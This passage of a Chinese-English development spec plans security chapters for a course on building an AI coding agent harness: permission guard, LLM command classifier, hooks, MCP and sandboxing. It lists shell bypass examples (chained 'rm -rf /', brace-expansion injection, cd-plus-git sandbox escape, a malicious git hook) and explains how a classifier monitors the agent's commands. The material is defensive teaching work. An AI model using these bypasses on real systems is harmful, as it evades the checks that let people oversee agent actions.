"command": "python agents/mock_mcp_server.py" + } + } +} +``` + +#### 工具集 (新增 2 个) + +```python +{ + "name": "mcp_list_servers", + "description": "List connected MCP servers and their tools.", + "input_schema": {"type": "object", "properties": {}} +} + +{ + "name": "mcp_discover", + "description": "Re-scan and register MCP tools from all connected servers.", + "input_schema": {"type": "object", "properties": {}} +} +``` + +#### Try It 实验内容 + +``` +1. "how many MCP servers are connected?" → mcp_list_servers +2. "rediscover tools from MCP servers" → mcp_discover +3. "count lines in s02_tool_use.py" → MCP count_lines 工具 +4. "search for 'PermissionGuard' in all files" → MCP search_content 工具 +``` + +--- + +### 【模块 E】s17: Secure Extension Harness (安全扩展总成) + +**文件**: `agents/s17_secure_extension_harness.py` +**预计行数**: ~450 行 +**依赖**: s13, s14, s15, s16 + +#### 文件头部模板 + +```python +#!/usr/bin/env python3 +# Harness: secure extension -- four lines of defense, one loop. +""" +s17_secure_extension_harness.py - Secure Extension Harness + +s13-s16 each run independently. Real systems need all layers +working together. The key is a clear execution pipeline where +each layer has one job. + + LLM calls tool + | + v + [1] Hook: PreToolUse ──block──> return error + | + v + [2] Classifier ──deny───> return error + | + v + [3] Permission ──deny───> return error + | ──ask───> user confirm? 
+      |
+      v
+  [4] Execute (built-in or MCP)
+      |
+      v
+  [5] Hook: PostToolUse (observe/log)
+      |
+      v
+  return result
+
+Key insight: "生产级 Harness 的核心不是功能多,而是各层职责清晰、互不干扰。"
+"""
+```
+
+#### Core execution pipeline
+
+```python
+def execute_tool(tool_name: str, tool_input: dict, context: dict) -> str:
+    # [1] PreToolUse hook (s15)
+    hook_ctx = {"tool": tool_name, "input": tool_input}
+    pre = HOOKS.fire("PreToolUse", hook_ctx)
+    if pre and pre.get("action") == "block":
+        return f"Blocked by hook: {pre['reason']}"
+
+    # [2] Security classification (s14, bash only), feeding
+    # [3] the permission decision (s13): the classifier's mode
+    #     (deny / ask / allow) serves directly as the permission verdict
+    if tool_name == "bash":
+        cmd = tool_input.get("command", "")
+        classification = CLASSIFIER.classify(cmd, context.get("recent_text", ""))
+        if classification["mode"] == "deny":
+            return f"Security denied: {classification['reason']}"
+        if classification["mode"] == "ask":
+            approved = input(
+                f"\033[31m[security:{classification['level']}] "
+                f"Allow: {cmd}? (y/n) \033[0m"
+            ).strip().lower() == "y"
+            if not approved:
+                return "User denied command"
+
+    # [4] Execute (built-in handler or MCP)
+    handler = TOOL_HANDLERS.get(tool_name)
+    if handler:
+        output = handler(**tool_input)
+    elif tool_name in MCP_MANAGER._tools:
+        output = MCP_MANAGER.call(tool_name, tool_input)
+    else:
+        output = f"Unknown tool: {tool_name}"
+
+    # [5] PostToolUse hook (s15)
+    HOOKS.fire("PostToolUse", {"tool": tool_name, "output": output})
+
+    return output
+```
+
+#### REPL commands
+
+```python
+REPL_COMMANDS = {
+    "/security": lambda: print(f"Classifier: active\nMode: default\nDeny rules: {len(DANGEROUS_PATTERNS)}"),
+    "/hooks": lambda: print(HOOKS.list_hooks()),
+    "/mcp": lambda: print(MCP_MANAGER.list_servers()),
+    "/audit": lambda: print((WORKDIR / ".hooks" / "audit.jsonl").read_text()[-2000:]),
+}
+```
+
+#### Tool set summary
+
+| Tool | Source | Type |
+|------|------|------|
+| bash | built-in | command execution through the security pipeline |
+| read_file | built-in | read a file |
+| write_file | built-in | write a file |
+| edit_file | built-in | edit a file |
+| hook_register | s15 | register a hook |
+| hook_list | s15 | list hooks |
+| mcp_list_servers | s16 |
列出 MCP 服务器 | +| mcp_discover | s16 | 发现 MCP 工具 | +| (动态) | MCP | 外部工具 | + +#### Try It 实验内容 + +``` +1. "list all python files" → all layers pass -> allow +2. "run rm -rf /" → classifier deny -> blocked +3. "write a test file and show audit log" → PostToolUse hook logs -> /audit 查看 +4. "search for 'PermissionGuard' via MCP" → MCP tool called through pipeline +5. "register a hook that blocks all pip commands" → dynamic hook registration +``` + +--- + +## 五、前端更新 + +### 【模块 F】constants.ts 更新 + +**文件**: `web/src/lib/constants.ts` + +```typescript +// 1. VERSION_ORDER 新增 s13-s17 +export const VERSION_ORDER = [ + "s01", "s02", "s03", "s04", "s05", "s06", "s07", "s08", + "s09", "s10", "s11", "s12", + "s13", "s14", "s15", "s16", "s17" // 新增 +] as const; + +// 2. VERSION_META 新增 5 个条目 +export const VERSION_META: Record = { + // ... 现有 s01-s12 ... + s13: { + title: "Permission Guard", + subtitle: "Not Every Command Should Run Automatically", + coreAddition: "PermissionGuard with 5 permission modes", + keyInsight: "把 '禁止' 升级为 '策略' -- 从一条 if 到一个权限模型", + layer: "security", + prevVersion: "s02", + }, + s14: { + title: "Security Classifier", + subtitle: "Let the Model Judge Its Own Commands", + coreAddition: "Two-layer classifier: regex quick-scan + LLM classification", + keyInsight: "正则表达式只认模式不认意图;LLM 能理解上下文,判断命令真正的危险程度", + layer: "security", + prevVersion: "s13", + }, + s15: { + title: "Hooks System", + subtitle: "Intercept Between Model and Tool", + coreAddition: "HookManager with 8 event types and 3 execution modes", + keyInsight: "Hooks 不改变工具的行为,但改变了工具何时、如何、是否被执行", + layer: "security", + prevVersion: "s13", + }, + s16: { + title: "MCP Client", + subtitle: "Tools Don't Have to Be Built-in", + coreAddition: "MCPClient + MCPManager for external tool servers", + keyInsight: "MCP 把工具分发从 dict 升级为网络协议", + layer: "security", + prevVersion: "s02", + }, + s17: { + title: "Secure Extension Harness", + subtitle: "Four Lines of Defense, One Loop", + coreAddition: "Unified execution 
pipeline: Hook -> Classify -> Permission -> Execute", + keyInsight: "生产级 Harness 的核心不是功能多,而是各层职责清晰、互不干扰", + layer: "security", + prevVersion: "s16", + }, +}; + +// 3. LAYERS 新增 security 层 +export const LAYERS = [ + { id: "tools" as const, label: "Tools & Execution", color: "#3B82F6", versions: ["s01", "s02"] }, + { id: "planning" as const, label: "Planning & Coordination", color: "#10B981", versions: ["s03", "s04", "s05", "s07"] }, + { id: "memory" as const, label: "Memory Management", color: "#8B5CF6", versions: ["s06"] }, + { id: "concurrency" as const, label: "Concurrency", color: "#F59E0B", versions: ["s08"] }, + { id: "collaboration" as const, label: "Collaboration", color: "#EF4444", versions: ["s09", "s10", "s11", "s12"] }, + // 新增 + { id: "security" as const, label: "Security & Extensibility", color: "#06B6D4", versions: ["s13", "s14", "s15", "s16", "s17"] }, +] as const; +``` + +### 【模块 F】国际化文件更新 + +**文件**: `web/src/i18n/messages/zh.json` + +在 `sessions` 和 `viz` 中新增: + +```json +{ + "sessions": { + "s13": "权限守卫", + "s14": "安全分类器", + "s15": "Hooks 事件系统", + "s16": "MCP 客户端", + "s17": "安全扩展总成" + }, + "layer_labels": { + "security": "安全与扩展" + }, + "layers": { + "security": "保护用户免受模型的伤害。权限模型、安全分类、生命周期 Hook 和外部工具协议。" + }, + "viz": { + "s13": "Permission Guard Pipeline", + "s14": "Two-Layer Security Classifier", + "s15": "Hook Manager Event Bus", + "s16": "MCP Tool Discovery", + "s17": "Secure Execution Pipeline" + } +} +``` + +**文件**: `web/src/i18n/messages/en.json` + +```json +{ + "sessions": { + "s13": "Permission Guard", + "s14": "Security Classifier", + "s15": "Hooks System", + "s16": "MCP Client", + "s17": "Secure Extension Harness" + }, + "layer_labels": { + "security": "Security & Extensibility" + }, + "layers": { + "security": "Protect the user from the agent. Permission models, security classifiers, lifecycle hooks, and external tool protocols." 
+ }, + "viz": { + "s13": "Permission Guard Pipeline", + "s14": "Two-Layer Security Classifier", + "s15": "Hook Manager Event Bus", + "s16": "MCP Tool Discovery", + "s17": "Secure Execution Pipeline" + } +} +``` + +**文件**: `web/src/i18n/messages/ja.json` + +```json +{ + "sessions": { + "s13": "権限ガード", + "s14": "セキュリティ分類器", + "s15": "Hooks システム", + "s16": "MCP クライアント", + "s17": "セキュア拡張ハーネス" + }, + "layer_labels": { + "security": "セキュリティと拡張性" + }, + "viz": { + "s13": "Permission Guard Pipeline", + "s14": "Two-Layer Security Classifier", + "s15": "Hook Manager Event Bus", + "s16": "MCP Tool Discovery", + "s17": "Secure Execution Pipeline" + } +} +``` + +### 【模块 G】模拟器场景数据 + +需要为每个新章节创建模拟器场景文件。 + +**文件**: `web/src/data/scenarios/s13.json` + +```json +{ + "version": "s13", + "title": "Permission Guard", + "description": "An agent with a permission model that classifies commands before execution", + "steps": [ + { + "type": "user_message", + "content": "List all files and then delete temp.log", + "annotation": "User sends a multi-step task" + }, + { + "type": "assistant_text", + "content": "I'll list the files first, then delete temp.log.", + "annotation": "Model plans two tool calls" + }, + { + "type": "tool_call", + "content": "ls -la", + "toolName": "bash", + "annotation": "ls is in ALLOWED_COMMANDS -> auto-allow" + }, + { + "type": "tool_result", + "content": "temp.log hello.py README.md", + "toolName": "bash", + "annotation": "Allowed: ls is a safe command" + }, + { + "type": "tool_call", + "content": "rm temp.log", + "toolName": "bash", + "annotation": "rm matches ASK_PATTERNS -> permission check" + }, + { + "type": "permission_check", + "mode": "ask", + "reason": "File deletion", + "command": "rm temp.log", + "annotation": "PermissionGuard classifies as 'ask' mode" + }, + { + "type": "tool_result", + "content": "(file deleted)", + "toolName": "bash", + "annotation": "User approved the deletion" + }, + { + "type": "assistant_text", + "content": "Done! 
Listed files and deleted temp.log.", + "annotation": "Both operations completed with appropriate permission checks" + } + ] +} +``` + +**文件**: `web/src/data/scenarios/s14.json` + +```json +{ + "version": "s14", + "title": "Security Classifier", + "description": "Two-layer command classification: regex quick-scan + LLM intent analysis", + "steps": [ + { + "type": "user_message", + "content": "Clean up the build directory and then check git status", + "annotation": "User asks for potentially dangerous operations" + }, + { + "type": "assistant_text", + "content": "I'll remove the build directory and check git status.", + "annotation": "Model plans two operations" + }, + { + "type": "tool_call", + "content": "rm -rf build/", + "toolName": "bash", + "annotation": "Quick scan: no dangerous pattern match. LLM classify needed." + }, + { + "type": "classifier_check", + "layer1": "pass", + "layer2": "moderate", + "mode": "ask", + "annotation": "LLM classifies 'rm -rf build/' as moderate risk" + }, + { + "type": "tool_result", + "content": "(build directory removed)", + "toolName": "bash", + "annotation": "User approved after LLM classification" + }, + { + "type": "tool_call", + "content": "git status", + "toolName": "bash", + "annotation": "git is in SAFE_COMMANDS whitelist -> auto-allow" + }, + { + "type": "tool_result", + "content": "On branch main\nnothing to commit", + "toolName": "bash", + "annotation": "Whitelist: zero-cost classification" + }, + { + "type": "assistant_text", + "content": "Build directory cleaned and git status checked.", + "annotation": "Both operations completed with appropriate classification" + } + ] +} +``` + +**文件**: `web/src/data/scenarios/s15.json` + +```json +{ + "version": "s15", + "title": "Hooks System", + "description": "Lifecycle hooks that intercept, log, and modify tool calls", + "steps": [ + { + "type": "user_message", + "content": "Create a new file called config.yaml with default settings", + "annotation": "User requests file 
creation" + }, + { + "type": "hook_fire", + "event": "AgentStart", + "annotation": "AgentStart hook fires" + }, + { + "type": "assistant_text", + "content": "I'll create config.yaml with default settings.", + "annotation": "Model decides to use write_file" + }, + { + "type": "hook_fire", + "event": "PreToolUse", + "tool": "write_file", + "annotation": "PreToolUse hook fires (no block)" + }, + { + "type": "tool_call", + "content": "key: value\ndebug: false", + "toolName": "write_file", + "annotation": "write_file executes" + }, + { + "type": "hook_fire", + "event": "PostToolUse", + "hook": "auto_git_add", + "annotation": "PostToolUse hook auto-git-adds the file" + }, + { + "type": "tool_result", + "content": "Wrote 27 bytes to config.yaml", + "toolName": "write_file", + "annotation": "File written and auto-staged" + }, + { + "type": "assistant_text", + "content": "Done! config.yaml created and auto-staged in git.", + "annotation": "Hook side-effect mentioned" + } + ] +} +``` + +**文件**: `web/src/data/scenarios/s16.json` + +```json +{ + "version": "s16", + "title": "MCP Client", + "description": "Connecting to external tool servers via Model Context Protocol", + "steps": [ + { + "type": "user_message", + "content": "How many lines of code are in s02_tool_use.py?", + "annotation": "User asks a question that can use MCP tools" + }, + { + "type": "assistant_text", + "content": "I'll use the MCP file analyzer to count lines.", + "annotation": "Model chooses MCP tool over bash" + }, + { + "type": "tool_call", + "content": "agents/s02_tool_use.py", + "toolName": "count_lines", + "annotation": "MCP tool discovered at startup" + }, + { + "type": "tool_result", + "content": "151 lines", + "toolName": "count_lines", + "annotation": "MCP server processes the request via JSON-RPC" + }, + { + "type": "assistant_text", + "content": "s02_tool_use.py has 151 lines of code.", + "annotation": "MCP tool result returned seamlessly" + } + ] +} +``` + +**文件**: 
`web/src/data/scenarios/s17.json` + +```json +{ + "version": "s17", + "title": "Secure Extension Harness", + "description": "Full security pipeline: Hook → Classify → Permission → Execute → PostHook", + "steps": [ + { + "type": "user_message", + "content": "Check git log and then force push to origin", + "annotation": "User mixes safe and dangerous operations" + }, + { + "type": "assistant_text", + "content": "I'll check the git log first.", + "annotation": "Model starts with safe operation" + }, + { + "type": "hook_fire", + "event": "PreToolUse", + "tool": "bash", + "annotation": "[Layer 1] PreToolUse hook fires" + }, + { + "type": "tool_call", + "content": "git log --oneline -5", + "toolName": "bash", + "annotation": "[Layer 2] Classifier: whitelist -> allow" + }, + { + "type": "hook_fire", + "event": "PostToolUse", + "annotation": "[Layer 5] PostToolUse audit log" + }, + { + "type": "tool_result", + "content": "a1b2c3d Fix bug\n e4f5g6h Add feature", + "toolName": "bash", + "annotation": "Safe command passed all layers" + }, + { + "type": "assistant_text", + "content": "Now I'll force push to origin.", + "annotation": "Model attempts dangerous operation" + }, + { + "type": "hook_fire", + "event": "PreToolUse", + "tool": "bash", + "annotation": "[Layer 1] PreToolUse hook fires" + }, + { + "type": "classifier_check", + "layer1": "blocked", + "reason": "Force push pattern matched", + "mode": "deny", + "annotation": "[Layer 2] Quick scan catches force push -> deny" + }, + { + "type": "tool_result", + "content": "Security denied: Force push pattern blocked", + "toolName": "bash", + "annotation": "Blocked at Layer 2, never reaches execution" + }, + { + "type": "assistant_text", + "content": "I can't force push as it's blocked by security policy. 
Would you like me to push normally instead?", + "annotation": "Model acknowledges the security block" + } + ] +} +``` + +### 【模块 G】模拟器组件增强 + +模拟器需要支持新的 step 类型来可视化安全管线: + +**需修改的文件**: `web/src/hooks/useSimulator.ts` + +新增 step 类型支持: +- `permission_check` — 显示权限检查 UI (allow/ask/deny) +- `classifier_check` — 显示分类器结果 (layer1 pass/block, layer2 safe/moderate/dangerous) +- `hook_fire` — 显示 Hook 触发事件 + +**需修改的文件**: `web/src/components/simulator/AgentLoopSimulator.tsx` + +新增可视化元素: +- 权限检查阶段:黄色警告图标 + 命令预览 +- 分类器阶段:双列显示 (Layer 1 regex / Layer 2 LLM) +- Hook 触发:闪电图标 + 事件名 + +--- + +## 六、文档文件 + +### 【模块 H】课程文档 + +每章需要 3 个文档(英文/中文/日文),遵循现有模板结构: + +``` +docs/en/s13-permission-guard.md +docs/en/s14-security-classifier.md +docs/en/s15-hooks-system.md +docs/en/s16-mcp-client.md +docs/en/s17-secure-extension-harness.md + +docs/zh/s13-permission-guard.md +docs/zh/s14-security-classifier.md +docs/zh/s15-hooks-system.md +docs/zh/s16-mcp-client.md +docs/zh/s17-secure-extension-harness.md + +docs/ja/s13-permission-guard.md +docs/ja/s14-security-classifier.md +docs/ja/s15-hooks-system.md +docs/ja/s16-mcp-client.md +docs/ja/s17-secure-extension-harness.md +``` + +每篇文档模板: + +```markdown +# sXX: [标题] ([中文标题]) + +`s02 > [ s13 ] > s14 ... | s15 | s16 > s17` + +> *"[标语]"* -- [核心概念] +> +> **Harness 层**: [层次描述] + +## 问题 + +[当前痛点,2-3 段] + +## 解决方案 + +``` +[ASCII 图示] +``` + +## 工作原理 + +[逐步代码解释] + +## 相对 sYY 的变更 + +| 组件 | 之前 (sYY) | 之后 (sXX) | +|------|-----------|-----------| + +## 现实对照 (Reality Check) + +> 真实 Claude Code 中的对应实现: +> - [对应源码模块 1] +> - [对应源码模块 2] + +## Try It + +```sh +cd learn-claude-code +python agents/sXX_[name].py +``` + +实验 prompt: +1. [具体任务 1] +2. [具体任务 2] +3. 
[具体任务 3]
+```
+
+---
+
+## 七、需更新的现有文件
+
+### 【模块 I】现有文件更新
+
+| 文件 | 修改内容 |
+|------|---------|
+| `agents/s_full.py` | 在 `# === SECTION: base_tools ===` 前增加 `# === SECTION: security ===`(SecurityClassifier + PermissionGuard + HookManager + MCPManager),修改 run_bash 使用安全管线。增加 REPL 命令 /security, /hooks, /mcp, /audit。预计增加 ~250 行 |
+| `README.md` | 更新课程目录,增加 Phase 5 描述 |
+| `README-zh.md` | 同上(中文版) |
+| `s01-s12-topic-map.md` | 扩展为 s01-s17-topic-map.md |
+| `web/src/lib/constants.ts` | 增加 s13-s17 的 VERSION_META 和 security layer |
+| `web/src/i18n/messages/en.json` | 增加 sessions/layer_labels/viz 条目 |
+| `web/src/i18n/messages/zh.json` | 同上(中文) |
+| `web/src/i18n/messages/ja.json` | 同上(日文) |
+| `web/src/hooks/useSimulator.ts` | 支持 permission_check / classifier_check / hook_fire step 类型 |
+| `web/src/components/simulator/AgentLoopSimulator.tsx` | 新增安全管线可视化 UI |
+| `web/scripts/extract-content.ts` | 确保 s13-s17 源码被正确提取 |
+
+---
+
+## 八、分工建议
+
+| 模块 | 标签 | 工作量 | 建议分工 |
+|------|------|--------|---------|
+| **A** | s13 Permission Guard | ~230 行 Python + 3 篇文档 | 开发者 1 |
+| **B** | s14 Security Classifier | ~280 行 Python + 3 篇文档 | 开发者 1 |
+| **C** | s15 Hooks System | ~300 行 Python + 3 篇文档 | 开发者 2 |
+| **D** | s16 MCP Client | ~350 行 Python + 3 篇文档 | 开发者 2 |
+| **E** | s17 Secure Extension Harness | ~450 行 Python + 3 篇文档 | 开发者 1+2 协作 |
+| **F** | 前端 constants + i18n | ~100 行 TypeScript/JSON | 开发者 3 |
+| **G** | 前端模拟器场景 + 组件 | ~300 行 TypeScript/JSON | 开发者 3 |
+| **H** | 课程文档 (15 篇) | ~15 篇 Markdown | 开发者 4 / AI 辅助 |
+| **I** | 现有文件更新 | ~400 行混合 | 开发者 3 或最后统一处理 |
+
+### 执行顺序
+
+```
+Week 1:
+  A(s13) → B(s14)       [开发者 1]
+  C(s15)                [开发者 2]
+  F(前端基础设施)         [开发者 3]
+  H(s13-s15 文档)        [开发者 4]
+
+Week 2:
+  D(s16)                [开发者 2]
+  E(s17)                [开发者 1+2]
+  G(模拟器场景+组件)      [开发者 3]
+  H(s16-s17 文档)        [开发者 4]
+
+Week 3:
+  I(现有文件更新)         [开发者 3]
+  集成测试 + s_full.py    [全员]
+```
+
+---
+---
+
+# Phase 6: PRODUCTION PATTERNS — 开发规格文档
+
+> **目标**: 新增 s18-s23 共 6 个章节,基于 claude-code 源码分析,深入生产级上下文管理、跨会话持久记忆、LLM 安全分类器、Bash 安全检查、Plugin 系统与 Sandbox 隔离。
+> 
**分析依据**: 2026-04-30 对 `/Users/yanghaoran/Code/claude-code/src/` 的完整源码分析。
+> **前置条件**: Phase 5 (s13-s17) 完成。
+
+---
+
+## Phase 6 总体架构
+
+### 新增章节依赖关系
+
+```
+s06 (上下文压缩)
+  └── s18 (Session Memory) — 结构化记忆 + 自动提取
+        └── s22 (跨会话 Memory) — 自动记忆提取 + MEMORY.md 索引
+
+s14 (安全分类器)
+  └── s19 (Auto Mode 分类器) — 两阶段 LLM 分类
+
+s13 (权限守卫)
+  ├── s20 (Bash 安全深度) — 命令白名单 + Flag 验证
+  └── s23 (Sandbox 隔离) — 路径白名单 + denyWrite
+
+s05 (Skills)
+  └── s21 (Plugin 系统) — 可组合插件架构
+```
+
+### 新增 Layer 定义
+
+现有 6 层 → 新增第 7 层 `production`:
+
+| Layer ID | Label (EN) | Label (ZH) | Color | Versions |
+|----------|-----------|-----------|-------|----------|
+| tools | Tools & Execution | 工具与执行 | #3B82F6 | s01, s02 |
+| planning | Planning & Coordination | 规划与协调 | #10B981 | s03, s04, s05, s07 |
+| memory | Memory Management | 记忆管理 | #8B5CF6 | s06 |
+| concurrency | Concurrency | 并发 | #F59E0B | s08 |
+| collaboration | Collaboration | 协作 | #EF4444 | s09, s10, s11, s12 |
+| security | Security & Extensibility | 安全与扩展 | #06B6D4 | s13, s14, s15, s16, s17 |
+| **production** | **Production Patterns** | **生产模式** | **#EC4899 (pink)** | **s18, s19, s20, s21, s22, s23** |
+
+---
+
+## Phase 6 教学内容概述
+
+### 为什么需要 Phase 6?
+
+s13-s17 把教学 Agent 从"玩具"升级到了"安全可扩展"。但对比真实 Claude Code 源码,还有几个关键的生产级模式没有覆盖:
+
+1. **s06 的上下文压缩太简单** — 真实系统有结构化的 Session Memory(10 个 section 模板、token 预算管理、自动提取)
+2. **s14 的 LLM 分类器太简单** — 真实系统有两阶段分类(Fast XML + Thinking),支持 PowerShell、transcript 重放、GrowthBook 特性开关
+3. **s13 的权限检查太简单** — 真实系统的 Bash 安全检查有 2000+ 行,包含命令白名单、Flag 级验证、Glob 检测、Git 内部路径保护
+4. 
**s05 的 Skills 太简单** — 真实系统有完整的 Plugin 架构(内置插件、Marketplace 插件、skills + hooks + MCP 三合一) + +Phase 6 要展示的是"从教学级到生产级"的工程差距,让学生理解真实系统的复杂性。 + +### s18: Session Memory — 会话记忆不是压缩,是结构化笔记 + +**一句话**: s06 教了"丢掉不重要的上下文",s18 教"把重要的上下文变成可检索的笔记"。 + +s06 的 compact 本质是"删减"——用 LLM 摘要替换原始对话,丢失细节。真实 Claude Code 的 Session Memory 是另一种思路:用 LLM 从对话中**提取**结构化笔记,持久化到磁盘,下次对话直接加载。 + +s18 引入 `SessionMemory` 系统: + +``` +对话进行中 (token 监控) + │ + ├─ 达到 10K tokens → 初始化 session-memory.md + │ + ├─ 每增长 5K tokens → 增量更新 + │ + └─ 对话结束 → 最终提取 + +session-memory.md 结构: +┌─────────────────────────────┐ +│ # Session Title │ ← 5-10 词描述 +│ # Current State │ ← 正在做什么 +│ # Task Specification │ ← 用户要求 +│ # Files and Functions │ ← 关键文件 +│ # Workflow │ ← 常用命令 +│ # Errors & Corrections │ ← 踩过的坑 +│ # Codebase Documentation │ ← 系统组件 +│ # Learnings │ ← 经验教训 +│ # Key Results │ ← 重要输出 +│ # Worklog │ ← 步骤日志 +└─────────────────────────────┘ +``` + +**Token 预算管理**: +- 每个 section 最多 2000 tokens +- 总计不超过 12000 tokens +- 超标时自动压缩(优先保留 Current State 和 Errors) + +**并发安全**: +- `inProgress` 锁防止并发提取 +- trailing extraction 模式:如果提取进行中又有新请求,记录最新上下文,等当前提取完成后再跑一次 + +**关键洞察**: 上下文管理的终极形态不是"压缩",而是"提取"。压缩是被动防御(防止超限),提取是主动积累(构建知识)。 + +**与真实源码的对照**: Claude Code 的 Session Memory 系统(`services/SessionMemory/`)包含: +- `sessionMemory.ts` — 主提取逻辑,forked agent 执行 +- `sessionMemoryUtils.ts` — Token 阈值配置、并发状态管理 +- `prompts.ts` — 10 section 模板、自定义 prompt 支持 +- `extractMemories.ts` — 自动记忆提取(独立于 Session Memory) +- 与 compact 联动:compact 后注入 Session Memory,实现"压缩不丢信息" + +--- + +### s19: Auto Mode Classifier — 两阶段 LLM 安全分类 + +**一句话**: s14 的单次 LLM 分类是 MVP,真实系统用两阶段分类实现精度和成本的平衡。 + +s14 的 LLM 分类器只用一次 LLM 调用,返回 safe/moderate/dangerous。这在教学场景足够,但生产环境有两个问题: +1. **精度不够** — 单次判断容易误判(`rm -rf node_modules/` vs `rm -rf /` 需要更多推理) +2. 
**成本浪费** — 所有命令都走 LLM,即使明显安全的也要花 token + +s19 引入**两阶段分类**: + +``` +命令进入 + │ + ▼ +[Stage 1: Fast XML 分类] + │ 快速判断,低成本 + │ XML 格式输出 + │ + ├─ safe → allow(确定性高,直接放行) + ├─ dangerous → deny(确定性高,直接拒绝) + │ + └─ uncertain → [Stage 2: Thinking 深度推理] + │ 带思维链的深度分析 + │ 考虑对话上下文 + │ 分析命令组合意图 + │ + └─ safe / moderate / dangerous +``` + +**安全兜底原则**: +- 任何阶段失败 → 默认 block(安全优先) +- 分类器不可用 → 默认 block +- 解析失败 → 默认 block +- Transcript 过长 → 默认 block + +**Transcript 传递**: +- 把当前对话历史(最近 N 轮)格式化为 JSONL +- 分类器能看到完整上下文,理解命令的"来龙去脉" + +**关键洞察**: 生产级 LLM 分类器的核心不是"更准",而是"安全兜底 + 成本优化"。Fast stage 处理 80% 的简单判断,Thinking stage 只处理 20% 的复杂情况。 + +**与真实源码的对照**: Claude Code 的 `yoloClassifier.ts`(`utils/permissions/`)实现了: +- `YoloClassifierTool` — 专用分类器工具定义 +- `buildYoloSystemPrompt` — 52KB 的安全分类 prompt +- 两阶段配置:`tengu_auto_mode_config` 中的 `twoStageClassifier`(both/fast/thinking) +- PowerShell 支持:专门的 `POWERSHELL_DENY_GUIDANCE` +- 完整遥测:`tengu_auto_mode_outcome` 追踪分类结果、token 开销、延迟 + +--- + +### s20: Bash Security Deep Dive — 2000 行安全检查拆解 + +**一句话**: s13 的正则匹配是入门,真实系统的 Bash 安全检查是一个完整的命令解析器。 + +s13 用正则表达式匹配危险模式(`rm -rf /`、`curl | sh`)。但这在真实场景中远远不够: + +- `ls; rm -rf /` — 分号拼接绕过 +- `git diff {@'{'0},--output=/tmp/pwned}` — brace expansion 注入 +- `cd /malicious && git status` — cd + git 沙箱逃逸 +- `uniq --skip-chars=0$_` — 变量展开走私 + +s20 引入**命令解析器级别的安全检查**: + +``` +命令字符串 + │ + ▼ +[Shell 解析] tryParseShellCommand() + │ 分词、处理引号、处理转义 + │ + ▼ +[Token 分析] + ├─ 命令白名单匹配 (COMMAND_ALLOWLIST) + ├─ Flag 级验证 (每个命令枚举合法 flag) + ├─ Glob 检测 (未引用的 *, ?, [...]) + ├─ 变量展开检测 (未引用的 $VAR) + ├─ Brace expansion 检测 ({a,b} 或 {1..5}) + │ + ▼ +[复合命令检查] + ├─ Git 内部路径保护 (HEAD, objects/, refs/, hooks/) + ├─ 沙箱逃逸检测 (cd + git 组合) + ├─ Bare repo 检测 + │ + ▼ +[路径验证] + └─ 写路径提取 + 沙箱白名单匹配 +``` + +**教学策略**:不实现完整的 2000 行检查器,而是用 5 个递进的攻击-防御案例展示思路: + +| 案例 | 攻击 | 防御 | +|------|------|------| +| 1 | `ls; rm -rf /` | 复合命令拆分 + 逐条检查 | +| 2 | `echo *` 扩展为危险参数 | Glob 检测 + 引号状态追踪 | +| 3 | `cd /tmp && git status` | cd + git 组合检测 | +| 4 | `mkdir hooks && echo 
malicious > hooks/pre-commit && git status` | Git 内部路径写检测 | +| 5 | `$_` 变量走私 | 变量展开检测(单引号内 literal,双引号内展开) | + +**关键洞察**: 安全检查的敌人不是"危险命令",而是"看起来无害但能被组合利用的命令"。一个好的安全检查器需要理解 Shell 的解析规则,而不仅仅是匹配字符串。 + +**与真实源码的对照**: Claude Code 的 Bash 安全系统分布在多个文件中: +- `tools/BashTool/bashSecurity.ts` — 23 种安全检查(命令替换、heredoc 注入、Zsh 危险命令等) +- `tools/BashTool/readOnlyValidation.ts` — 2000+ 行的只读命令验证,包含: + - `COMMAND_ALLOWLIST` — 40+ 命令的白名单 + Flag 级验证 + - `READONLY_COMMAND_REGEXES` — 正则回退 + - `containsUnquotedExpansion()` — Shell 引号状态机 + - `commandWritesToGitInternalPaths()` — Git 内部路径检测 + - `checkReadOnlyConstraints()` — 统一入口 +- `utils/permissions/bashClassifier.ts` — Bash 命令分类 +- `utils/powershell/dangerousCmdlets.ts` — PowerShell 7 类危险 cmdlet + +--- + +### s21: Plugin System — Skills、Hooks、MCP 的统一容器 + +**一句话**: s05 的 Skill 是单一知识单元,s21 的 Plugin 是包含 skills + hooks + MCP 的可组合容器。 + +s05 的 Skill 系统解决了"按需加载知识"的问题。但真实系统中,用户扩展不只是知识,还包括: +- **行为拦截**(Hooks) — 每次工具调用前/后执行自定义逻辑 +- **外部工具**(MCP) — 连接数据库、API、文件分析器 +- **知识注入**(Skills) — 领域专业知识 + +这三者经常需要一起使用。例如"数据库助手"插件需要: +- 一个 MCP 服务器(连接数据库) +- 几个 Skills(SQL 最佳实践、表结构文档) +- 几个 Hooks(查询前记录审计日志) + +s21 引入 `PluginManager`: + +``` +~/.claude/plugins/ + ├── db-assistant/ + │ ├── manifest.json ← 插件元数据 + │ ├── skills/ ← 知识文件 + │ ├── hooks/ ← Hook 配置 + │ └── mcp-servers/ ← MCP 服务器配置 + │ + └── code-reviewer/ + ├── manifest.json + └── skills/ + +manifest.json: +{ + "name": "db-assistant", + "version": "1.0.0", + "description": "Database query and analysis assistant", + "skills": ["sql-best-practices.md", "schema-reference.md"], + "hooks": { + "PreToolUse": "audit-log.py" + }, + "mcpServers": { + "db-query": { "transport": "stdio", "command": "python db_server.py" } + } +} +``` + +**与 Skill 的区别**: +| 维度 | Skill (s05) | Plugin (s21) | +|------|-------------|--------------| +| 内容 | 单一知识文件 | skills + hooks + MCP | +| 加载 | 按需 | 启动时 + 按需 | +| 管理 | 文件系统 | 注册表(enable/disable) | +| 隔离 | 共享命名空间 | 插件命名空间(`plugin:skill`) | + +**关键洞察**: Plugin 是"s05 + s15 + 
